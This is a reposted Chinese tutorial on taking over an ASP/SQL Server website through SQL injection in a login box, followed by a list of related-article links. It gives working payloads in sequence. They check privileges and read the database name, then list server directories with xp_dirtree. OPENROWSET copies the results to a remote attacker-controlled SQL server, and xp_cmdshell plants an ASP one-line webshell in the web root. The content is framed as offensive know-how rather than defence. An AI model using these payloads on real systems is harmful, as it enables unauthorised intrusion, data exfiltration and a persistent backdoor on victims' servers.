服务器只有一个站,又找不到注入点怎么办?
    你可以试试在搜索框,登陆,任何框框里放个单引号,看看是否报错       
       初级部分

加个单引号',后面随便,随便填个密码,点击登陆

典型的SQL注入
判断权限: ' and user>0--

明显的sa权限

获取数据库名字: ' and db_name()>0--

很容易获取到,数据库名,如果不是sa权限 ,比如public权限,我们可以通过差异备份获取shell,但本教程不必了
下面开始高级部分:
就不截图了,就是把下面代码放入登录框执行
一:建表,3个字段
';create table nonamed([name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--
二,把服务器e盘目录和文件名字全部加入到表中(为什么e盘,因为e盘放的是网站目录,我就不啰嗦了)
';insert nonamed execute master..xp_dirtree 'e:\',1,1--

三,把此表中内容插入到远程计算机的SQL数据库中,(自己的电脑)
   必须有外网,
本地的电脑必须有一张和服务器创建相同的表,表名无所谓,此例子为e表
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e') select * from nonamed--

回到本地查询表e

上面的第3个XXX_Site 里面就是放的网站,如何看XXX_Site里的内容,继续循环执行前面二三步就可以了,
再次执行要情空表 delete from nonamed
然后执行
';insert nonamed execute master..xp_dirtree 'e:\XXX_Site\',1,1--
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e_site') select * from nonamed--
e_site表是本地的表
发现wwwroot 
好了,写一句话木马吧!
';exec master..xp_cmdshell 'Echo ^<%eval request("a")%>^ >e:\xxx_site\wwwroot\a.asp'
public权限可以通过差异备份写马,上面已经提到了
远程连接即可

转载于:https://www.cnblogs.com/amwld/archive/2011/08/11/2134975.html

高级SQL注入拿shell,一般黑客不知道。哈客相关推荐

  1. 黑客攻击技术之高级SQL注入技术(转)

    黑客攻击技术之高级SQL注入技术(转)[@more@] 我们知道,在SQL语句中,可以使用各种MySQL内置的函数,经常使用的就是DATABASE().USER().SYSTEM_USER().SES ...

  2. SQL Server应用程序中的高级SQL注入

    作者:不详 来源:techtarget http://www.csai.cn 2006年5月11日 摘要:这份文档是详细讨论SQL注入技术,它适应于比较流行的IIS+ASP+SQLSERVER平台.它 ...

  3. SQL Server应用程序中的高级SQL注入[转]

    SQL Server应用程序中的高级SQL注入[从A.Z的POST里转载,经过整理] 作者:Chris Anley[chris@ngssoftware.com] An NGSSoftware Insi ...

  4. 安全漏洞之SQL注入和shell注入

    SQL注入 发生部位 SQL注入安全漏洞发生于应用程序和数据库之间. 原理 当攻击者在输入的字符串之中注入SQL指令,由于程序没有设置相关的字符检查,那么这些指令就会被数据服务器认为是正常的SQL指令 ...

  5. 【SQL注入技巧拓展】————4、高级SQL注入:混淆和绕过

    [0×01] – 简介 大家好,这是一篇致力于文档化我们所从事的高级SQL注入技术的文章. 本文将要揭示能用于现实CMSs和WAFs程序中的高级绕过技术和混淆技术.文中所提到的SQL注入语句仅仅是一些 ...

  6. MYSQLg高级-----SQL注入的理解(初级篇)以及如何防止注入

    SQL注入 1.SQL 注入概念 1.1 SQL注入是什么? 1.2 SQL注入定义 1.3 SQL注入特点 1.广泛性 2.隐蔽性 3.危害大 4.操作方便 1.4 SQl注入原理 1.5 SQl注 ...

  7. Web安全——sql注入

    由于我的博客是学到渗透的时候才做的,没有关于WEB漏洞的笔记,现在发现WEB层面的漏洞有些不太熟悉了,边写一下笔记边复习一下,就从sql注入开始吧 话不多说先上表,基本常用的手工注入函数解释都在这 u ...

  8. [转]数据安全之SQL注入资料整理

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉. ...

  9. 第三百九十二节,Django+Xadmin打造上线标准的在线教育平台—sql注入攻击,xss攻击,csrf攻击...

    第三百九十二节,Django+Xadmin打造上线标准的在线教育平台-sql注入攻击,xss攻击,csrf攻击 sql注入攻击 也就是黑客通过表单提交的地方,在表单里输入了sql语句,就是通过SQL语 ...

最新文章

  1. ARKIT/ARCore对比分析(一)
  2. linux驱动:TI+DM8127+GPIO(一)之应用——报警输入输出
  3. JavaScript 中遍历对象的属性
  4. 【绝对有用】Server Tomcat v9.0 Server at localhost failed to start
  5. 原生js声音播放代码
  6. alias怎么每次登陆都保存_设置alias别名并使之重启或者注销用户之后依旧生效...
  7. Kafka : 报错 KafkaController NoSuchElementException : : key not found : [xxx]
  8. 红帽高级总监谈 OpenJDK 的未来:Java 的未来从未如此光明
  9. java 联合_Java标记的联合/和类型
  10. Python 程序 可以一直输入 quit_Python二级考试临时抱佛脚专用笔记——(二)基本控制结构的程序设计amp;数据的输入和输出...
  11. 图片背景处理技巧快来学学
  12. [趣谈网络协议学习] 07 ICMP与ping:投石问路的侦察兵
  13. 鸿蒙app学习笔记一
  14. MySQL (4) 第一范式 第二范式 第三范式 BC范式
  15. Flickr 被封!
  16. 董源烟岚重溪图——澄心堂纸本考证
  17. 二自由度车辆的运动学模型和动力学模型
  18. android虹软人脸识别简书,Android 用虹软SDK做人脸识别
  19. 使用ffmpeg拼接视频踩坑记录
  20. RTKLIB 2.4.2(p12)与RTKLIB 2.4.3(b34)功能对比分析---RTKLIB学习系列文章(一)

热门文章

  1. 软件:推荐五款超级好用的电脑小众软件,值得收藏!
  2. 让步的人,最值得深交
  3. 配置文件服务器实训报告,文件服务器的配置实训报告
  4. C语言链表为什么倒着输出,关于链表倒着存,正着输出。
  5. iphone 抹除设备是什么意思_SMT设备有哪些,SMT是什么意思?
  6. Linux文件和目录权限:chmod、更改所有者和所属组:chown,umask命令,隐藏权限:lsattr/chattr...
  7. C++ 反射机制的简单实现
  8. 在CentOS中安装gcc配置c语言开发环境(转)
  9. MCGS与PLC通讯不上
  10. conversion to dalvik format failed with error 1的解决办法